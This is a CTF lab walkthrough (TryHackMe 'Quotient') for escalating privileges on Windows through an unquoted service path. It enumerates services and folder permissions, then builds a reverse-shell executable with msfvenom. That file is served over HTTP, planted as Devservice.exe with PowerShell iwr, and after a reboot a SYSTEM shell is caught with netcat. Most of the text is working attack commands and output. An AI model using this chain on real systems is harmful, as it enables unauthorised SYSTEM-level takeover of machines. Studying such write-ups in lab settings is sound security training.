Quotient
THM Quotient, Windows unquoted service path, like this
Firstly, login with xfreerdp not rdesktop. Because xfreerdp works and rdesktop doesn’t.
┌──(root💀kali)-[/opt/thm/quotient]
└─# xfreerdp /u:"sage" /v:10.10.160.163
[06:36:18:262] [3317:3318] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position
[06:36:18:262] [3317:3318] [WARN][com.freerdp.crypto] - CN = thm-quotient
Password:
[06:36:25:286] [3317:3318] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
# etcPS C:\Users\Sage> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v "*"
Amazon SSM Agent AmazonSSMAgent "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" Auto
AWS Lite Guest Agent AWSLiteAgent "C:\Program Files\Amazon\XenTools\LiteAgent.exe" Auto
Developmenet Service Development Service C:\Program Files\Development Files\Devservice Files\Service.exe Auto
Windows Defender Antivirus Service WinDefend "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MsMpEng.exe" Auto
C:\Users\Sage>sc qc "Development Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Development Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Development Files\Devservice Files\Service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Developmenet Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\Sage>cd "C:\Program Files\Development Files"
c:\Program Files\Development Files>icacls "C:\Program Files\Development Files"
C:\Program Files\Development Files BUILTIN\Users:(W)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)Make a service, note the name is the critical part:
┌──(root💀kali)-[/opt/thm/quotient]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.9.0.117 LPORT=443 -f exe -o Devservice.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: Devservice.exe
┌──(root💀kali)-[/opt/thm/quotient]
└─# updog
[+] Serving /opt/thm/quotient...
* Running on all addresses.
WARNING: This is a development server. Do not use it in a production deployment.
* Running on http://192.168.86.44:9090/ (Press CTRL+C to quit)
10.10.160.163 - - [24/Jul/2022 06:15:14] "GET /Devservice.exe HTTP/1.1" 200 -Grab the file and call a reboot, since we can’t start/stop the service manually:
c:\Program Files\Development Files>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Program Files\Development Files> iwr http://10.9.0.117:9090/Devservice.exe -OutFile "C:\Program Files\Development Files\Devservice.exe"
PS C:\Program Files\Development Files>shutdown /r /t 0and, when the reboot runs (log back in with xfreerdp):
┌──(root💀kali)-[/opt/thm/quotient]
└─# nc -nvlp 443
listening on [any] 443 ...
connect to [10.9.0.117] from (UNKNOWN) [10.10.160.163] 49670
Microsoft Windows [Version 10.0.17763.3165]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system